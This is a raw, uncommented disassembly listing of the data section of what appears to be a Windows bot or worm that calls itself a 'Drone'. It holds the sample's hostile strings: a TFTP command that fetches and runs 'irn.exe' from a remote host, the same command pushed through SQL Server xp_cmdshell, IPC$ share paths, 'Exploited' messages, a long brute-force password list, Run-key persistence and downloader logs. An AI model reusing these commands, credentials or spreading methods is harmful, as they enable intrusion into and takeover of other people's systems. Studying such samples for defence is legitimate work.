aS_0 db '%s',0 ; DATA XREF: sub_413A2D+18C�o
byte_41EF0B db 0 ; DATA XREF: .data:off_424650�o
; char aS_1[]
aS_1 db '%s',0 ; DATA XREF: sub_413A2D+29C�o
byte_41EF0F db 0 ; DATA XREF: sub_41B925+1DD�o
; char aS_2[]
aS_2 db '%s',0 ; DATA XREF: sub_413A2D+386�o
align 4
; char aS_3[]
aS_3 db '%s',0 ; DATA XREF: sub_413A2D+495�o
byte_41EF17 db 0 ; DATA XREF: .text:loc_41C061�o
aBadAllocatio_1 db 'bad allocation',0 ; DATA XREF: .data:00424524�o
align 4
aTftpISGetIrn_e db 'tftp -i %s GET irn.exe&start irn.exe&exit',0Dh,0Ah,0
aBadAllocatio_2 db 'bad allocation',0 ; DATA XREF: .data:004245D8�o
align 4
dword_41EF64 dd 5C0D0A00h ; DATA XREF: sub_41A5C1+1F�r
dword_41EF68 dd 2E2F5Fh ; DATA XREF: sub_41A5C1+27�r
dword_41EF6C dd 0 ; DATA XREF: sub_41A5C1+2C�o
dword_41EF70 dd 0 ; DATA XREF: sub_41A5C1+51�o
; char aHttpSDS_0[]
aHttpSDS_0 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A5C1+F1�o
; char aHttpSDS_1[]
aHttpSDS_1 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A5C1+162�o
aBadAllocatio_3 db 'bad allocation',0
align 4
aWindowsNt42000 db 'Windows NT4, 2000 (SP0-SP4)',0
aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: .data:00424634�o
align 4
aIpc:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
dd 2 dup(0)
aIpc_0:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
; char a_[]
a_ db '.',0 ; DATA XREF: sub_41A9DE+57�o
align 4
; char aSIpc[]
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_41A9DE+76�o
align 4
; char aSPipeBrowser[]
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_41A9DE+CA�o
align 4
dword_41F02C dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_41A9DE+191�o
dword_41F040 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 3 dup(0)
; DATA XREF: sub_41A9DE+1AC�o
dd 2EBh, 0
; char aHttpSDS_2[]
aHttpSDS_2 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A9DE+3D3�o
; char aHttpSDS_3[]
aHttpSDS_3 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A9DE+451�o
; char aSExploitedS_[]
aSExploitedS_ db '%s: Exploited: %s.',0 ; DATA XREF: sub_41A9DE+786�o
align 4
aBadAllocatio_4 db 'bad allocation',0 ; DATA XREF: .data:00424648�o
align 4
aSa db 'sa',0 ; DATA XREF: sub_41B1A0+55�o
align 4
aRoot db 'root',0 ; DATA XREF: sub_41B1A0+5C�o
align 4
aAdmin db 'admin',0 ; DATA XREF: sub_41B1A0+63�o
align 4
; char aDriverSqlServe[]
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: sub_41B1A0+10C�o
align 10h
; char aExecMaster[]
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET irn.exe&start irn.exe'
; DATA XREF: sub_41B1A0+197�o
db '&exit',0Dh,0Ah
db 27h,0
align 4
; char aSExploitedS__0[]
aSExploitedS__0 db '%s: Exploited %s.',0 ; DATA XREF: sub_41B1A0+1F1�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .data:00424654�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:00424658�o
align 4
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0042465C�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:00424660�o
aAdmins db 'admins',0 ; DATA XREF: .data:00424664�o
align 10h
aAdmin_0 db 'admin',0 ; DATA XREF: .data:00424668�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:0042466C�o
aPassword1 db 'password1',0 ; DATA XREF: .data:00424670�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:00424674�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .data:00424678�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:0042467C�o
align 4
aPass db 'pass',0 ; DATA XREF: .data:00424680�o
align 10h
aPwd db 'pwd',0 ; DATA XREF: .data:00424684�o
a007 db '007',0 ; DATA XREF: .data:00424688�o
a1: ; DATA XREF: .data:0042468C�o
unicode 0, <1>,0
a12 db '12',0 ; DATA XREF: .data:00424690�o
align 10h
a123 db '123',0 ; DATA XREF: .data:00424694�o
a1234 db '1234',0 ; DATA XREF: .data:00424698�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:0042469C�o
align 4
a123456 db '123456',0 ; DATA XREF: .data:004246A0�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:004246A4�o
a12345678 db '12345678',0 ; DATA XREF: .data:004246A8�o
align 10h
a123456789 db '123456789',0 ; DATA XREF: .data:004246AC�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:004246B0�o
align 4
a2000 db '2000',0 ; DATA XREF: .data:004246B4�o
align 10h
a2001 db '2001',0 ; DATA XREF: .data:004246B8�o
align 4
a2002 db '2002',0 ; DATA XREF: .data:004246BC�o
align 10h
a2003 db '2003',0 ; DATA XREF: .data:004246C0�o
align 4
a2004 db '2004',0 ; DATA XREF: .data:004246C4�o
align 10h
aTest db 'test',0 ; DATA XREF: .data:004246C8�o
align 4
aGuest db 'guest',0 ; DATA XREF: .data:004246CC�o
align 10h
aNone db 'none',0 ; DATA XREF: .data:004246D0�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:004246D4�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .data:004246D8�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:004246DC�o
align 10h
aChangeme db 'changeme',0 ; DATA XREF: .data:004246E0�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:004246E4�o
aSystem_0 db 'system',0 ; DATA XREF: .data:004246E8�o
align 4
aServer db 'server',0 ; DATA XREF: .data:004246EC�o
align 4
aRoot_0 db 'root',0 ; DATA XREF: .data:004246F0�o
align 4
aNull_1 db 'null',0 ; DATA XREF: .data:004246F4�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:004246F8�o
align 4
aMail db 'mail',0 ; DATA XREF: .data:004246FC�o
align 4
aOutlook db 'outlook',0 ; DATA XREF: .data:00424700�o
aWeb db 'web',0 ; DATA XREF: .data:00424704�o
aWww db 'www',0 ; DATA XREF: .data:00424708�o
aInternet db 'internet',0 ; DATA XREF: .data:0042470C�o
align 10h
aAccounts db 'accounts',0 ; DATA XREF: .data:00424710�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .data:00424714�o
align 4
aHome db 'home',0 ; DATA XREF: .data:00424718�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: .data:0042471C�o
align 4
aUser db 'user',0 ; DATA XREF: .data:00424720�o
align 4
aOem db 'oem',0 ; DATA XREF: .data:00424724�o
aOemuser db 'oemuser',0 ; DATA XREF: .data:00424728�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0042472C�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:00424730�o
aWin98 db 'win98',0 ; DATA XREF: .data:00424734�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:00424738�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:0042473C�o
align 4
aWinnt db 'winnt',0 ; DATA XREF: .data:00424740�o
align 4
aWin2000 db 'win2000',0 ; DATA XREF: .data:00424744�o
aQaz db 'qaz',0 ; DATA XREF: .data:00424748�o
aAsd db 'asd',0 ; DATA XREF: .data:0042474C�o
aZxc db 'zxc',0 ; DATA XREF: .data:00424750�o
aQwe db 'qwe',0 ; DATA XREF: .data:00424754�o
aBob db 'bob',0 ; DATA XREF: .data:00424758�o
aJen db 'jen',0 ; DATA XREF: .data:0042475C�o
aJoe db 'joe',0 ; DATA XREF: .data:00424760�o
aFred db 'fred',0 ; DATA XREF: .data:00424764�o
align 10h
aBill db 'bill',0 ; DATA XREF: .data:00424768�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:0042476C�o
align 10h
aJohn db 'john',0 ; DATA XREF: .data:00424770�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:00424774�o
align 10h
aLuke db 'luke',0 ; DATA XREF: .data:00424778�o
align 4
aSam db 'sam',0 ; DATA XREF: .data:0042477C�o
aSue db 'sue',0 ; DATA XREF: .data:00424780�o
aSusan db 'susan',0 ; DATA XREF: .data:00424784�o
align 4
aPeter_0 db 'peter',0 ; DATA XREF: .data:00424788�o
align 10h
aBrian db 'brian',0 ; DATA XREF: .data:0042478C�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:00424790�o
aNeil db 'neil',0 ; DATA XREF: .data:00424794�o
align 4
aIan db 'ian',0 ; DATA XREF: .data:00424798�o
aChris db 'chris',0 ; DATA XREF: .data:0042479C�o
align 10h
aEric db 'eric',0 ; DATA XREF: .data:004247A0�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:004247A4�o
align 10h
aKate db 'kate',0 ; DATA XREF: .data:004247A8�o
align 4
aBob_0 db 'bob',0 ; DATA XREF: .data:004247AC�o
aKatie db 'katie',0 ; DATA XREF: .data:004247B0�o
align 4
aMary db 'mary',0 ; DATA XREF: .data:004247B4�o
align 4
aLogin db 'login',0 ; DATA XREF: .data:004247B8�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .data:004247BC�o
align 10h
aTechnical db 'technical',0 ; DATA XREF: .data:004247C0�o
align 4
aBackup db 'backup',0 ; DATA XREF: .data:004247C4�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .data:004247C8�o
align 10h
aFuck db 'fuck',0 ; DATA XREF: .data:004247CC�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:004247D0�o
align 10h
aSlut db 'slut',0 ; DATA XREF: .data:004247D4�o
align 4
aSex db 'sex',0 ; DATA XREF: .data:004247D8�o
aGod db 'god',0 ; DATA XREF: .data:004247DC�o
aHell db 'hell',0 ; DATA XREF: .data:004247E0�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:004247E4�o
align 10h
aDomain db 'domain',0 ; DATA XREF: .data:004247E8�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .data:004247EC�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:004247F0�o
align 4
aDatabase db 'database',0 ; DATA XREF: .data:004247F4�o
align 10h
aAccess db 'access',0 ; DATA XREF: .data:004247F8�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:004247FC�o
align 10h
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:00424800�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:00424804�o
align 4
aData db 'data',0 ; DATA XREF: .data:00424808�o
align 4
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:0042480C�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .data:00424810�o
aDb2 db 'db2',0 ; DATA XREF: .data:00424814�o
aDb1234 db 'db1234',0 ; DATA XREF: .data:00424818�o
align 4
aSa_0 db 'sa',0 ; DATA XREF: .data:0042481C�o
align 4
aSql db 'sql',0 ; DATA XREF: .data:00424820�o
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:00424824�o
align 4
aOrainstall db 'orainstall',0 ; DATA XREF: .data:00424828�o
align 10h
aOracle db 'oracle',0 ; DATA XREF: .data:0042482C�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .data:00424830�o
aCisco db 'cisco',0 ; DATA XREF: .data:00424834�o
align 4
aDell db 'dell',0 ; DATA XREF: .data:00424838�o
align 4
aCompaq db 'compaq',0 ; DATA XREF: .data:0042483C�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: .data:00424840�o
aHp db 'hp',0 ; DATA XREF: .data:00424844�o
align 10h
aNokia db 'nokia',0 ; DATA XREF: .data:00424848�o
align 4
aXp_0 db 'xp',0 ; DATA XREF: .data:0042484C�o
align 4
aControl db 'control',0 ; DATA XREF: .data:00424850�o
aOffice db 'office',0 ; DATA XREF: .data:00424854�o
align 4
aBlank db 'blank',0 ; DATA XREF: .data:00424858�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: .data:0042485C�o
aMain db 'main',0 ; DATA XREF: .data:00424860�o
align 4
aLan db 'lan',0 ; DATA XREF: .data:00424864�o
aInternet_0 db 'internet',0 ; DATA XREF: .data:00424868�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: .data:0042486C�o
align 10h
aStudent db 'student',0 ; DATA XREF: .data:00424870�o
aTeacher db 'teacher',0 ; DATA XREF: .data:00424874�o
aStaff db 'staff',0 ; DATA XREF: .data:00424878�o
align 4
aBadAllocatio_5 db 'bad allocation',0 ; DATA XREF: .data:0042464C�o
align 4
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_41A391+21�o
align 4
aMhz db '~MHz',0 ; DATA XREF: sub_41A391+4A�o
align 10h
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_41A391+6D�o
; char aS_15[]
aS_15 db '%s',0 ; DATA XREF: sub_41A391+AD�o
align 4
; char aSC_1[]
aSC_1 db '%s%c',0 ; DATA XREF: sub_41A391+112�o
align 10h
; char aUnknown[]
aUnknown db 'Unknown',0 ; DATA XREF: sub_41A391+165�o
; char aHardwareDesc_0[]
aHardwareDesc_0 db 'HARDWARE\DESCRIPTION\System\CentralProcessor\%i',0
; DATA XREF: sub_41A391+1B7�o
; char aSysinfo[]
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_41C370+8F�o
; char aNetinfo[]
aNetinfo db 'netinfo',0 ; DATA XREF: sub_41C370+AB�o
aBadAllocatio_6 db 'bad allocation',0 ; DATA XREF: .data:00424880�o
align 4
; char aHttp[]
aHttp db 'http',0 ; DATA XREF: sub_41C370+73�o
align 10h
aBadAllocatio_7 db 'bad allocation',0 ; DATA XREF: .data:00424884�o
align 10h
aDl db 'DL',0
align 4
; char aDownload[]
aDownload db 'download',0 ; DATA XREF: sub_41C370+3B�o
align 10h
; char aUpdate[]
aUpdate db 'update',0 ; DATA XREF: sub_41C370+57�o
align 4
aMozilla5_0 db 'Mozilla/5.0',0 ; DATA XREF: sub_41B925+33�o
; char aDlDownloadingS[]
aDlDownloadingS db 'DL: Downloading %s to %s',0 ; DATA XREF: sub_41B925+51�o
align 10h
aDlFailedBadLoc db 'DL: Failed; Bad Location.',0 ; DATA XREF: sub_41B925:loc_41BAEF�o
align 4
; char aDlDownloadSIBy[]
aDlDownloadSIBy db 'DL: Download %s (%i Bytes) finished in %i seconds (%iKB/s)',0
; DATA XREF: sub_41B925+156�o
align 4
; char aMainUninstalli[]
aMainUninstalli db 'Main: Uninstalling Drone',0 ; DATA XREF: sub_41B925+1A7�o
align 4
aDlFailedToUpda db 'DL: Failed To Update',0 ; DATA XREF: sub_41B925:loc_41BAF6�o
align 4
aDlErrorExecuti db 'DL: Error Executing File.',0 ; DATA XREF: sub_41B925+1ED�o
align 4
; char aDlExecutedFile[]
aDlExecutedFile db 'DL: Executed File: %s',0 ; DATA XREF: sub_41B925+1FC�o
align 10h
aDlFailedBadUrl db 'DL: Failed; Bad URL',0 ; DATA XREF: sub_41B925:loc_41BB3D�o
; char aDlFailedWinine[]
aDlFailedWinine db 'DL: Failed; WinINET Error',0 ; DATA XREF: sub_41B925:loc_41BB44�o
align 10h
aBadAllocatio_8 db 'bad allocation',0 ; DATA XREF: .data:00424888�o
align 10h
aBadAllocatio_9 db 'bad allocation',0 ; DATA XREF: .data:0042488C�o
align 10h
aTftpServer db 'TFTP Server',0 ; DATA XREF: sub_41B775+5A�o
; char aRb[]
aRb db 'rb',0 ; DATA XREF: sub_41B3D0+44�o
align 10h
; char aTftpSendComple[]
aTftpSendComple db 'TFTP: Send Complete To %s. %d Total Sends',0
; DATA XREF: sub_41B3D0+1A4�o
align 4
aBadAllocati_10 db 'bad allocation',0 ; DATA XREF: .data:00424890�o
align 10h
dd 428A2F98h, 71374491h, 0B5C0FBCFh, 0E9B5DBA5h, 3956C25Bh
dd 59F111F1h, 923F82A4h, 0AB1C5ED5h, 0D807AA98h, 12835B01h
dd 243185BEh, 550C7DC3h, 72BE5D74h, 80DEB1FEh, 9BDC06A7h
dd 0C19BF174h, 0E49B69C1h, 0EFBE4786h, 0FC19DC6h, 240CA1CCh
dd 2DE92C6Fh, 4A7484AAh, 5CB0A9DCh, 76F988DAh, 983E5152h
dd 0A831C66Dh, 0B00327C8h, 0BF597FC7h, 0C6E00BF3h, 0D5A79147h
dd 6CA6351h, 14292967h, 27B70A85h, 2E1B2138h, 4D2C6DFCh
dd 53380D13h, 650A7354h, 766A0ABBh, 81C2C92Eh, 92722C85h
dd 0A2BFE8A1h, 0A81A664Bh, 0C24B8B70h, 0C76C51A3h, 0D192E819h
dd 0D6990624h, 0F40E3585h, 106AA070h, 19A4C116h, 1E376C08h
dd 2748774Ch, 34B0BCB5h, 391C0CB3h, 4ED8AA4Ah, 5B9CCA4Fh
dd 682E6FF3h, 748F82EEh, 78A5636Fh, 84C87814h, 8CC70208h
dd 90BEFFFAh, 0A4506CEBh, 0BEF9A3F7h, 0C67178F2h, 6A09E667h
dd 0BB67AE85h, 3C6EF372h, 0A54FF53Ah, 510E527Fh, 9B05688Ch
dd 1F83D9ABh, 5BE0CD19h
dword_41F950 dd 0D728AE22h ; DATA XREF: sub_4143D0+318�r
dword_41F954 dd 428A2F98h ; DATA XREF: sub_4143D0+31F�r
dword_41F958 dd 23EF65CDh ; DATA XREF: sub_4143D0+548�r
dword_41F95C dd 71374491h ; DATA XREF: sub_4143D0+54F�r
dword_41F960 dd 0EC4D3B2Fh ; DATA XREF: sub_4143D0+772�r
dword_41F964 dd 0B5C0FBCFh ; DATA XREF: sub_4143D0+779�r
dword_41F968 dd 8189DBBCh ; DATA XREF: sub_4143D0+9B8�r
dword_41F96C dd 0E9B5DBA5h ; DATA XREF: sub_4143D0+9BF�r
dword_41F970 dd 0F348B538h ; DATA XREF: sub_4143D0+BFE�r
dword_41F974 dd 3956C25Bh ; DATA XREF: sub_4143D0+C09�r
dword_41F978 dd 0B605D019h ; DATA XREF: sub_4143D0+E80�r
dword_41F97C dd 59F111F1h ; DATA XREF: sub_4143D0+E87�r
dword_41F980 dd 0AF194F9Bh ; DATA XREF: sub_4143D0+10D7�r
dword_41F984 dd 923F82A4h ; DATA XREF: sub_4143D0+10DE�r
dword_41F988 dd 0DA6D8118h ; DATA XREF: sub_4143D0+1319�r
dword_41F98C dd 0AB1C5ED5h ; DATA XREF: sub_4143D0+1320�r
dword_41F990 dd 0A3030242h ; DATA XREF: sub_4143D0+1569�r
dword_41F994 dd 0D807AA98h ; DATA XREF: sub_4143D0+1570�r
dword_41F998 dd 45706FBEh ; DATA XREF: sub_4143D0+17AB�r
dword_41F99C dd 12835B01h ; DATA XREF: sub_4143D0+17B2�r
dword_41F9A0 dd 4EE4B28Ch ; DATA XREF: sub_4143D0+19F3�r
dword_41F9A4 dd 243185BEh ; DATA XREF: sub_4143D0+19FA�r
dword_41F9A8 dd 0D5FFB4E2h ; DATA XREF: sub_4143D0+1C39�r
dword_41F9AC dd 550C7DC3h ; DATA XREF: sub_4143D0+1C40�r
dword_41F9B0 dd 0F27B896Fh ; DATA XREF: sub_4143D0+1E91�r
dword_41F9B4 dd 72BE5D74h ; DATA XREF: sub_4143D0+1E9C�r
dword_41F9B8 dd 3B1696B1h ; DATA XREF: sub_4143D0+210D�r
dword_41F9BC dd 80DEB1FEh ; DATA XREF: sub_4143D0+2114�r
dword_41F9C0 dd 25C71235h ; DATA XREF: sub_4143D0+236A�r
dword_41F9C4 dd 9BDC06A7h ; DATA XREF: sub_4143D0+2371�r
dword_41F9C8 dd 0CF692694h ; DATA XREF: sub_4143D0+25B8�r
dword_41F9CC dd 0C19BF174h ; DATA XREF: sub_4143D0+25BF�r
dd 9EF14AD2h, 0E49B69C1h, 384F25E3h, 0EFBE4786h, 8B8CD5B5h
dd 0FC19DC6h, 77AC9C65h, 240CA1CCh, 592B0275h, 2DE92C6Fh
dd 6EA6E483h, 4A7484AAh, 0BD41FBD4h, 5CB0A9DCh, 831153B5h
dd 76F988DAh, 0EE66DFABh, 983E5152h, 2DB43210h, 0A831C66Dh
dd 98FB213Fh, 0B00327C8h, 0BEEF0EE4h, 0BF597FC7h, 3DA88FC2h
dd 0C6E00BF3h, 930AA725h, 0D5A79147h, 0E003826Fh, 6CA6351h
dd 0A0E6E70h, 14292967h, 46D22FFCh, 27B70A85h, 5C26C926h
dd 2E1B2138h, 5AC42AEDh, 4D2C6DFCh, 9D95B3DFh, 53380D13h
dd 8BAF63DEh, 650A7354h, 3C77B2A8h, 766A0ABBh, 47EDAEE6h
dd 81C2C92Eh, 1482353Bh, 92722C85h, 4CF10364h, 0A2BFE8A1h
dd 0BC423001h, 0A81A664Bh, 0D0F89791h, 0C24B8B70h, 654BE30h
dd 0C76C51A3h, 0D6EF5218h, 0D192E819h, 5565A910h, 0D6990624h
dd 5771202Ah, 0F40E3585h, 32BBD1B8h, 106AA070h, 0B8D2D0C8h
dd 19A4C116h, 5141AB53h, 1E376C08h, 0DF8EEB99h, 2748774Ch
dd 0E19B48A8h, 34B0BCB5h, 0C5C95A63h, 391C0CB3h, 0E3418ACBh
dd 4ED8AA4Ah, 7763E373h, 5B9CCA4Fh, 0D6B2B8A3h, 682E6FF3h
dd 5DEFB2FCh, 748F82EEh, 43172F60h, 78A5636Fh, 0A1F0AB72h
dd 84C87814h, 1A6439ECh, 8CC70208h, 23631E28h, 90BEFFFAh
dd 0DE82BDE9h, 0A4506CEBh, 0B2C67915h, 0BEF9A3F7h, 0E372532Bh
dd 0C67178F2h, 0EA26619Ch, 0CA273ECEh, 21C0C207h, 0D186B8C7h
dd 0CDE0EB1Eh, 0EADA7DD6h, 0EE6ED178h, 0F57D4F7Fh, 72176FBAh
dd 6F067AAh, 0A2C898A6h, 0A637DC5h, 0BEF90DAEh, 113F9804h
dd 131C471Bh, 1B710B35h, 23047D84h, 28DB77F5h, 40C72493h
dd 32CAAB7Bh, 15C9BEBCh, 3C9EBE0Ah, 9C100D4Ch, 431D67C4h
dd 0CB3E42B6h, 4CC5D4BEh, 0FC657E2Ah, 597F299Ch, 3AD6FAECh
dd 5FCB6FABh, 4A475817h, 6C44198Ch, 0C1059ED8h, 0CBBB9D5Dh
dd 367CD507h, 629A292Ah, 3070DD17h, 9159015Ah, 0F70E5939h
dd 152FECD8h, 0FFC00B31h, 67332667h, 68581511h, 8EB44A87h
dd 64F98FA7h, 0DB0C2E0Dh, 0BEFA4FA4h, 47B5481Dh, 90h dup(0)
dword_41FE50 dd 0F3BCC908h, 6A09E667h, 84CAA73Bh, 0BB67AE85h, 0FE94F82Bh
; DATA XREF: sub_4143A0+17�o
dd 3C6EF372h, 5F1D36F1h, 0A54FF53Ah, 0ADE682D1h, 510E527Fh
dd 2B3E6C1Fh, 9B05688Ch, 0FB41BD6Bh, 1F83D9ABh, 137E2179h
dd 5BE0CD19h, 90h dup(0)
aBadAllocati_11 db 'bad allocation',0
align 10h
aBadAllocati_12 db 'bad allocation',0 ; DATA XREF: .data:00424A40�o
align 10h
; char Format[]
Format db '%s\%s',0 ; DATA XREF: sub_416F86+DC�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_416F86+10C�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_416F86+14F�o
align 4
; char aSS_1[]
aSS_1 db '%s\%s',0 ; DATA XREF: sub_417119+BA�o
align 10h
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417119+F9�o
align 10h
aSoftwareMicr_2 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417119+14D�o
align 10h
aBadAllocati_13 db 'bad allocation',0 ; DATA XREF: .data:00424A44�o
align 10h
aIrn db '--irn ',0 ; DATA XREF: .text:0041BC44�o
align 4
aSS db '%s\%s',0 ; DATA XREF: .text:0041BCF1�o
align 10h
aSSS db '%s %s%s',0 ; DATA XREF: .text:0041BDBF�o
aS db '%s',0 ; DATA XREF: .text:0041BE51�o
align 4
aRm db 'RM',0 ; DATA XREF: .text:0041BF25�o
align 10h
aBk db 'BK',0 ; DATA XREF: .text:0041BF5E�o
align 4
aUnm db 'UNM',0 ; DATA XREF: .text:0041BF83�o
aBadAllocati_14 db 'bad allocation',0 ; DATA XREF: .data:00425224�o
align 4
; char aSS_7[]
aSS_7 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41829C+42�o
; char aSS_5[]
aSS_5 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41802F+159�o
; char aSS_6[]
aSS_6 db '%s-%s',0 ; DATA XREF: sub_41802F+1D6�o
align 10h
; char aSSSS00S[]
aSSSS00S db '%s %s',0Dh,0Ah ; DATA XREF: sub_41802F+24D�o
db '%s %s 0 0 :%s',0Dh,0Ah,0
align 4
; char asc_420238[]
asc_420238 db 0Dh,0Ah,0 ; DATA XREF: sub_417F01+7E�o
align 4
; char aS_18[]
aS_18 db '%s',0 ; DATA XREF: sub_417F01+B6�o
align 10h
; char asc_420240[]
asc_420240 db 0Dh,0Ah,0 ; DATA XREF: sub_417F01+CB�o
align 4
; char aSSS_0[]
aSSS_0 db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_417361+C2�o
align 10h
; char aS_5[]
aS_5 db '%s',0 ; DATA XREF: sub_41783D+4A�o
align 4
; char SubStr[]
SubStr db ' :',0 ; DATA XREF: sub_41783D+7E�o
align 4
; char aS_6[]
aS_6 db '%s',0 ; DATA XREF: sub_41783D+8A�o
align 4
; char asc_42025C[]
asc_42025C: ; DATA XREF: sub_41783D+E1�o
unicode 0, < >,0
; char aS_7[]
aS_7 db '%s',0 ; DATA XREF: sub_41783D+FA�o
align 4
; char asc_420264[]
asc_420264: ; DATA XREF: sub_41783D+124�o
unicode 0, < >,0
; char aSS_4[]
aSS_4 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41783D+24A�o
; char aSSS_1[]
aSSS_1 db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_41783D+31E�o
align 4
a001 db '001',0 ; DATA XREF: sub_41783D+33A�o
; char aSSSSSS[]
aSSSSSS db '%s %s %s',0Dh,0Ah ; DATA XREF: sub_41783D+3D3�o
db '%s %s %s',0Dh,0Ah,0
align 4
a332 db '332',0 ; DATA XREF: sub_41783D+417�o
; char asc_42029C[]
asc_42029C db ' :',0 ; DATA XREF: sub_41783D+499�o
align 10h
; char aS_8[]
aS_8 db '%s',0 ; DATA XREF: sub_41783D+4A5�o
align 4
; char asc_4202A4[]
asc_4202A4: ; DATA XREF: sub_41783D+4D9�o
unicode 0, <!>,0
; char aS_9[]
aS_9 db '%s',0 ; DATA XREF: sub_41783D+4E5�o
align 4
a332_0 db '332',0 ; DATA XREF: sub_41783D+52D�o
; char aS_10[]
aS_10 db '%s',0 ; DATA XREF: sub_41783D+546�o
align 4
; char aS_11[]
aS_11 db '%s',0 ; DATA XREF: sub_41783D+5B1�o
align 4
; char aS_12[]
aS_12 db '%s',0 ; DATA XREF: sub_41783D+5DF�o
align 4
asc_4202BC: ; DATA XREF: sub_41783D+64E�o
unicode 0, <;>,0
; char asc_4202C0[]
asc_4202C0: ; DATA XREF: sub_41783D:loc_417E92�o
unicode 0, <;>,0
; char asc_4202C4[]
asc_4202C4: ; DATA XREF: sub_41783D:loc_417E9F�o
unicode 0, <;>,0
; char Delim[]
Delim: ; DATA XREF: sub_417676+C�o
unicode 0, < >,0
; char Str2[]
Str2 db '-s',0 ; DATA XREF: sub_417676+27�o
align 10h
; char aS_17[]
aS_17 db '/s',0 ; DATA XREF: sub_417676+3F�o
align 4
; char asc_4202D4[]
asc_4202D4: ; DATA XREF: sub_417676:loc_4176CA�o
unicode 0, < >,0
aQwertyuiopasdf db 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM',0
; DATA XREF: sub_41748B+21�o
align 10h
; char asc_420310[]
asc_420310: ; DATA XREF: sub_41748B+5E�o
unicode 0, <[>,0
; char aSS_2[]
aSS_2 db '%s%s|',0 ; DATA XREF: sub_41748B+95�o
align 4
; char aSS_3[]
aSS_3 db '%s%s|',0 ; DATA XREF: sub_41748B+C5�o
align 4
; char aSp[]
aSp db '%sP|',0 ; DATA XREF: sub_41748B+F0�o
align 4
; char aS0I64u[]
aS0I64u db '%s0%I64u|',0 ; DATA XREF: sub_41748B+12F�o
align 4
; char aSI64u[]
aSI64u db '%s%I64u|',0 ; DATA XREF: sub_41748B+150�o
align 4
; char aSC[]
aSC db '%s%c',0 ; DATA XREF: sub_41748B+18F�o
align 4
; char aS_4[]
aS_4 db '%s]',0 ; DATA XREF: sub_41748B+1BA�o
aBadAllocati_15 db 'bad allocation',0
align 10h
aHs db 'HS',0 ; DATA XREF: sub_418D17+28�o
align 4
asc_420364: ; DATA XREF: sub_418C40+89�o
unicode 0, < >,0
; char aSS_9[]
aSS_9 db '%s\%s',0 ; DATA XREF: sub_418B1F+4E�o
align 10h
aGet db 'GET',0 ; DATA XREF: sub_418552+B7�o
; char aQue?[]
